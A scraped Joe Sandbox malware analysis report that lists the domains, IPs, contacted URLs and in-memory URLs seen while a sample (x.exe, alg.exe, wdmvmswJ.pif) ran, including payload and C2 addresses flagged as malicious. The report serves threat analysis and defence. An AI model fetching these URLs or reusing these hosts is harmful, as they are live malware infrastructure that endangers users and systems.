                                                            ltpqsnu.biz
                                                            		18.208.156.248
                                                            		truefalse
                                                              sctmku.biz
                                                              		35.164.78.200
                                                              		truefalse
                                                                gcedd.biz
                                                                		13.251.16.150
                                                                		truefalse
                                                                  wxgzshna.biz
                                                                  		72.52.178.23
                                                                  		truefalse
                                                                    oshhkdluh.biz
                                                                    		54.244.188.177
                                                                    		truetrue
                                                                      opowhhece.biz
                                                                      		18.208.156.248
                                                                      		truefalse
                                                                        pectx.biz
                                                                        		18.246.231.120
                                                                        		truetrue
                                                                          jwkoeoqns.biz
                                                                          		18.208.156.248
                                                                          		truefalse
                                                                            jpskm.biz
                                                                            		34.211.97.45
                                                                            		truefalse
                                                                              cjvgcl.biz
                                                                              		18.208.156.248
                                                                              		truefalse
                                                                                ifsaia.biz
                                                                                		13.251.16.150
                                                                                		truefalse
                                                                                  rynmcq.biz
                                                                                  		54.244.188.177
                                                                                  		truetrue
                                                                                    fjumtfnz.biz
                                                                                    		34.211.97.45
                                                                                    		truefalse
                                                                                      dyjdrp.biz
                                                                                      		54.244.188.177
                                                                                      		truetrue
                                                                                        ypituyqsq.biz
                                                                                        		3.94.10.34
                                                                                        		truefalse
                                                                                          tnevuluw.biz
                                                                                          		35.164.78.200
                                                                                          		truefalse
                                                                                            znwbniskf.biz
                                                                                            		47.129.31.212
                                                                                            		truefalse
                                                                                              ijnmvqa.biz
                                                                                              		35.164.78.200
                                                                                              		truefalse
                                                                                                saytjshyf.biz
                                                                                                		44.221.84.105
                                                                                                		truefalse
                                                                                                  rrqafepng.biz
                                                                                                  		47.129.31.212
                                                                                                  		truefalse
                                                                                                    aatcwo.biz
                                                                                                    		47.129.31.212
                                                                                                    		truefalse
                                                                                                      uphca.biz
                                                                                                      		44.221.84.105
                                                                                                      		truefalse
                                                                                                        htwqzczce.biz
                                                                                                        		172.234.222.138
                                                                                                        		truefalse
                                                                                                          xyrgy.biz
                                                                                                          		18.208.156.248
                                                                                                          		truefalse
                                                                                                            banwyw.biz
                                                                                                            		44.221.84.105
                                                                                                            		truefalse
                                                                                                              myups.biz
                                                                                                              		165.160.13.20
                                                                                                              		truefalse
                                                                                                                pwlqfu.biz
                                                                                                                		34.246.200.160
                                                                                                                		truefalse
                                                                                                                  zyiexezl.biz
                                                                                                                  		18.208.156.248
                                                                                                                  		truefalse
                                                                                                                    hlzfuyy.biz
                                                                                                                    		34.211.97.45
                                                                                                                    		truefalse
                                                                                                                      ssbzmoy.biz
                                                                                                                      		18.141.10.107
                                                                                                                      		truetrue
                                                                                                                        knjghuig.biz
                                                                                                                        		18.141.10.107
                                                                                                                        		truetrue
                                                                                                                          yunalwv.biz
                                                                                                                          		208.100.26.245
                                                                                                                          		truefalse
                                                                                                                            brsua.biz
                                                                                                                            		3.254.94.185
                                                                                                                            		truefalse
                                                                                                                              mgmsclkyu.biz
                                                                                                                              		34.246.200.160
                                                                                                                              		truefalse
                                                                                                                                cpclnad.biz
                                                                                                                                		44.221.84.105
                                                                                                                                		truefalse
                                                                                                                                  ptrim.biz
                                                                                                                                  		18.141.10.107
                                                                                                                                  		truetrue
                                                                                                                                    ihcnogskt.biz
                                                                                                                                    		35.164.78.200
                                                                                                                                    		truefalse
                                                                                                                                      qpnczch.biz
                                                                                                                                      		18.246.231.120
                                                                                                                                      		truetrue
                                                                                                                                        mnjmhp.biz
                                                                                                                                        		47.129.31.212
                                                                                                                                        		truefalse
                                                                                                                                          acwjcqqv.biz
                                                                                                                                          		18.141.10.107
                                                                                                                                          		truetrue
                                                                                                                                            zrlssa.biz
                                                                                                                                            		44.221.84.105
                                                                                                                                            		truefalse
                                                                                                                                              pywolwnvd.biz
                                                                                                                                              		54.244.188.177
                                                                                                                                              		truetrue
                                                                                                                                                mjheo.biz
                                                                                                                                                		44.221.84.105
                                                                                                                                                		truefalse
                                                                                                                                                  lrxdmhrr.biz
                                                                                                                                                  		54.244.188.177
                                                                                                                                                  		truetrue
                                                                                                                                                    vrrazpdh.biz
                                                                                                                                                    		34.211.97.45
                                                                                                                                                    		truefalse
                                                                                                                                                      cikivjto.biz
                                                                                                                                                      		18.246.231.120
                                                                                                                                                      		truetrue
                                                                                                                                                        fgajqjyhr.biz
                                                                                                                                                        		34.211.97.45
                                                                                                                                                        		truefalse
                                                                                                                                                          hehckyov.biz
                                                                                                                                                          		44.221.84.105
                                                                                                                                                          		truefalse
                                                                                                                                                            kkqypycm.biz
                                                                                                                                                            		18.141.10.107
                                                                                                                                                            		truetrue
                                                                                                                                                              bzkysubds.biz
                                                                                                                                                              		3.94.10.34
                                                                                                                                                              		truefalse
                                                                                                                                                                xlfhhhm.biz
                                                                                                                                                                		47.129.31.212
                                                                                                                                                                		truefalse
                                                                                                                                                                  warkcdu.biz
                                                                                                                                                                  		18.141.10.107
                                                                                                                                                                  		truetrue
                                                                                                                                                                    npukfztj.biz
                                                                                                                                                                    		44.221.84.105
                                                                                                                                                                    		truefalse
                                                                                                                                                                      dwrqljrr.biz
                                                                                                                                                                      		54.244.188.177
                                                                                                                                                                      		truetrue
                                                                                                                                                                        gytujflc.biz
                                                                                                                                                                        		208.100.26.245
                                                                                                                                                                        		truefalse
                                                                                                                                                                          gvijgjwkh.biz
                                                                                                                                                                          		3.94.10.34
                                                                                                                                                                          		truefalse
                                                                                                                                                                            sewlqwcd.biz
                                                                                                                                                                            		44.221.84.105
                                                                                                                                                                            		truefalse
                                                                                                                                                                              vnvbt.biz
                                                                                                                                                                              		18.246.231.120
                                                                                                                                                                              		truetrue
                                                                                                                                                                                chichometextiles.com
                                                                                                                                                                                		188.114.97.3
                                                                                                                                                                                		truetrue
                                                                                                                                                                                  nwdnxrd.biz
                                                                                                                                                                                  		54.244.188.177
                                                                                                                                                                                  		truetrue
                                                                                                                                                                                    qvuhsaqa.biz
                                                                                                                                                                                    		54.244.188.177
                                                                                                                                                                                    		truetrue
                                                                                                                                                                                      iuzpxe.biz
                                                                                                                                                                                      		13.251.16.150
                                                                                                                                                                                      		truefalse
                                                                                                                                                                                        nqwjmb.biz
                                                                                                                                                                                        		35.164.78.200
                                                                                                                                                                                        		truefalse
                                                                                                                                                                                          wllvnzb.biz
                                                                                                                                                                                          		18.141.10.107
                                                                                                                                                                                          		truetrue
                                                                                                                                                                                            kvbjaur.biz
                                                                                                                                                                                            		54.244.188.177
                                                                                                                                                                                            		truetrue
                                                                                                                                                                                              napws.biz
                                                                                                                                                                                              		35.164.78.200
                                                                                                                                                                                              		truefalse
                                                                                                                                                                                                cvgrf.biz
                                                                                                                                                                                                		54.244.188.177
                                                                                                                                                                                                		truetrue
                                                                                                                                                                                                  lpuegx.biz
                                                                                                                                                                                                  		82.112.184.197
                                                                                                                                                                                                  		truetrue
                                                                                                                                                                                                    vcddkls.biz
                                                                                                                                                                                                    		18.141.10.107
                                                                                                                                                                                                    		truetrue
                                                                                                                                                                                                      wluwplyh.biz
                                                                                                                                                                                                      		18.141.10.107
                                                                                                                                                                                                      		truetrue
                                                                                                                                                                                                        vyome.biz
                                                                                                                                                                                                        		18.246.231.120
                                                                                                                                                                                                        		truetrue
                                                                                                                                                                                                          dlynankz.biz
                                                                                                                                                                                                          		85.214.228.140
                                                                                                                                                                                                          		truefalse
                                                                                                                                                                                                            reczwga.biz
                                                                                                                                                                                                            		44.221.84.105
                                                                                                                                                                                                            		truefalse
                                                                                                                                                                                                              xccjj.biz
                                                                                                                                                                                                              		18.246.231.120
                                                                                                                                                                                                              		truetrue

                                                                                                                                                                                                                Contacted URLs

                                                                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                http://typgfhb.biz/yhjyfalse
                                                                                                                                                                                                                  http://xlfhhhm.biz/hnpfnrirpigaufalse
                                                                                                                                                                                                                    http://vyome.biz/qpwpqegnfgthpmmjtrue
                                                                                                                                                                                                                      http://rynmcq.biz/dxlhstrue
                                                                                                                                                                                                                        http://iuzpxe.biz/bjgrtfalse
                                                                                                                                                                                                                          http://lpuegx.biz/iiuonvofxntrue
                                                                                                                                                                                                                            http://myups.biz/woumhgcotofalse
                                                                                                                                                                                                                              http://qaynky.biz/fkcgbfiiatbbgssefalse
                                                                                                                                                                                                                                http://ifsaia.biz/lglryrrfalse
                                                                                                                                                                                                                                  http://htwqzczce.biz/xbfalse
                                                                                                                                                                                                                                    http://jdhhbs.biz/qpbiwobfalse
                                                                                                                                                                                                                                      http://gnqgo.biz/eccfsowypckinddifalse
                                                                                                                                                                                                                                        http://vyome.biz/tbncyidxtibogxqtrue
                                                                                                                                                                                                                                          http://saytjshyf.biz/upfalse
                                                                                                                                                                                                                                            http://vgypotwp.biz/kkrtrue
                                                                                                                                                                                                                                              http://sxmiywsfv.biz/donafalse
                                                                                                                                                                                                                                                http://mgmsclkyu.biz/enxhgeexxmdafalse
                                                                                                                                                                                                                                                  http://ijnmvqa.biz/hpkfalse
                                                                                                                                                                                                                                                    http://gcedd.biz/ectmddoihjyrxjpfalse
                                                                                                                                                                                                                                                      http://tnevuluw.biz/fiarjsoopiyhmfalse
                                                                                                                                                                                                                                                        http://oshhkdluh.biz/crmhxhtbtrue
                                                                                                                                                                                                                                                          http://gytujflc.biz/hckdbdnsiwdfalse
                                                                                                                                                                                                                                                            http://bghjpy.biz/tpnlrogxefalse
                                                                                                                                                                                                                                                              http://ecxbwt.biz/lvawmhxutrue
                                                                                                                                                                                                                                                                http://pgfsvwx.biz/mgvdqejexijygsbfalse
                                                                                                                                                                                                                                                                  http://lpuegx.biz/gcpevfxhbnbtrue
                                                                                                                                                                                                                                                                    http://zgapiej.biz/mmqkhapthxjsnhfalse
                                                                                                                                                                                                                                                                      http://jlqltsjvh.biz/sntrue
                                                                                                                                                                                                                                                                        http://rynmcq.biz/fwiohktfcqxxnbhtrue
                                                                                                                                                                                                                                                                          http://ihcnogskt.biz/nroqcaxgfalse
                                                                                                                                                                                                                                                                            http://rffxu.biz/ojwsrlrloafalse
                                                                                                                                                                                                                                                                              http://sxmiywsfv.biz/vkbkkrofalse
                                                                                                                                                                                                                                                                                http://wluwplyh.biz/ugrdtwtacntrue
                                                                                                                                                                                                                                                                                  http://kvbjaur.biz/yrotrue
                                                                                                                                                                                                                                                                                    http://cikivjto.biz/haroldungxttrue
                                                                                                                                                                                                                                                                                      http://apzzls.biz/ybboglafalse
                                                                                                                                                                                                                                                                                        http://wxgzshna.biz/buaqnbkgjrfalse
                                                                                                                                                                                                                                                                                          http://uaafd.biz/kitrue
                                                                                                                                                                                                                                                                                            http://pgfsvwx.biz/bulntsganndwfalse
                                                                                                                                                                                                                                                                                              http://jpskm.biz/ceabvuhcchcwyyqfalse
                                                                                                                                                                                                                                                                                                http://gvijgjwkh.biz/sbnabfalse
                                                                                                                                                                                                                                                                                                  http://oflybfv.biz/bqfalse
                                                                                                                                                                                                                                                                                                    http://sxmiywsfv.biz/jdoddcjkmiicjrmwfalse
                                                                                                                                                                                                                                                                                                      http://vyome.biz/sntrue
                                                                                                                                                                                                                                                                                                        http://iuzpxe.biz/gblgywtxfalse
                                                                                                                                                                                                                                                                                                          http://ssbzmoy.biz/uvrrtrue
                                                                                                                                                                                                                                                                                                            http://acwjcqqv.biz/dtupajxvntrue
                                                                                                                                                                                                                                                                                                              http://qaynky.biz/ymbuxxmrfalse
                                                                                                                                                                                                                                                                                                                http://ftxlah.biz/ljfalse
                                                                                                                                                                                                                                                                                                                  http://shpwbsrw.biz/ldxvcwjydqqfalse
                                                                                                                                                                                                                                                                                                                    http://giliplg.biz/qtrue
                                                                                                                                                                                                                                                                                                                      http://dlynankz.biz/rifmhdkgmasffalse
                                                                                                                                                                                                                                                                                                                        http://gcedd.biz/fxyeanegauuypgfalse
                                                                                                                                                                                                                                                                                                                          http://ypituyqsq.biz/vbohqiwvfalse
                                                                                                                                                                                                                                                                                                                            http://fwiwk.biz/qmcamdwfalse
                                                                                                                                                                                                                                                                                                                              http://gytujflc.biz/bvawourmbxmjmarrfalse
                                                                                                                                                                                                                                                                                                                                http://gvijgjwkh.biz/leqjfalse
                                                                                                                                                                                                                                                                                                                                  http://dlynankz.biz/kfmcpedbjrfalse
                                                                                                                                                                                                                                                                                                                                    http://uevrpr.biz/smeisoexdoewotrue
                                                                                                                                                                                                                                                                                                                                      http://vjaxhpbji.biz/qrcvkhcipjtrue
                                                                                                                                                                                                                                                                                                                                        http://jdhhbs.biz/nuyubwfalse
                                                                                                                                                                                                                                                                                                                                          http://ereplfx.biz/hkamlwlybbhtrue
                                                                                                                                                                                                                                                                                                                                            http://lpuegx.biz/lrywafstrue
                                                                                                                                                                                                                                                                                                                                              http://qpnczch.biz/tfbvwglkixktrue
                                                                                                                                                                                                                                                                                                                                                http://cvgrf.biz/uqcynitxoaixtrue
                                                                                                                                                                                                                                                                                                                                                  http://qaynky.biz/afalse
                                                                                                                                                                                                                                                                                                                                                    http://warkcdu.biz/btmiljbhjxtrue
                                                                                                                                                                                                                                                                                                                                                      https://chichometextiles.com/wp-admin/233_Jwsmvmdweyatrue
                                                                                                                                                                                                                                                                                                                                                        http://lpuegx.biz/hbcdkqyacacfvqqptrue

                                                                                                                                                                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/55alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                            http://18.141.10.107/ngsalg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107/1alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                  http://35.164.78.200/ekxopalg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                    http://35.164.78.200/vekxopngsalg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                      http://18.141.10.107/0alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                        http://44.221.84.105/alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          http://208.100.26.245/bh.Talg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            http://bumxkqgxu.biz/alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              http://34.246.200.160/wnelecid4alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107/idnuvngsalg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyahx.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    https://chichometextiles.com/x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                                                                                                                                                                      http://18.208.156.248/aoayitmlcurkmalg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://www.pmail.comx.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/pe6alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138/e6alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              http://tbjrpv.biz/k7/pValg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/Halg.exe, 00000010.00000003.2028087857.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://44.221.84.105/1q6alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/1palg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        http://208.100.26.245/mralg.exe, 00000010.00000003.2677590947.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2663033990.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://44.221.84.105/1salg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            http://34.246.200.160/wneleRiU4alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              http://172.234.222.138:80/hmsaqgigfaxqleZalg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                http://47.129.31.212/xwfedwcvhvxkihaalg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  http://35.164.78.200/vekxopatbalg.exe, 00000010.00000003.2079470414.00000000005A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                    http://44.221.84.105/55alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                      http://dwrqljrr.biz/alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                        62.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                                                                                                                                                                                                        		18013ASLINE-AS-APASLINELIMITEDHKtrue
                                                                                                                                                                                                                                                                                                                                                                                                                        165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        34.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        		fwiwk.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        18.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        		kcyvxytog.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        		apzzls.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        		yunalwv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        35.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        		sctmku.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                        		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        		wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        188.114.97.3
                                                                                                                                                                                                                                                                                                                                                                                                                        		chichometextiles.comEuropean Union
                                                                                                                                                                                                                                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        		bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                        		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                        		6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        		nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        		xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        		qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                        		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        		ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                        82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                        		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUtrue
                                                                                                                                                                                                                                                                                                                                                                                                                        18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                        		16509AMAZON-02UStrue

                                                                                                                                                                                                                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                        Analysis ID:1546600
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date and time:2024-11-01 08:22:10 +01:00
                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                        Overall analysis duration:0h 16m 57s
                                                                                                                                                                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
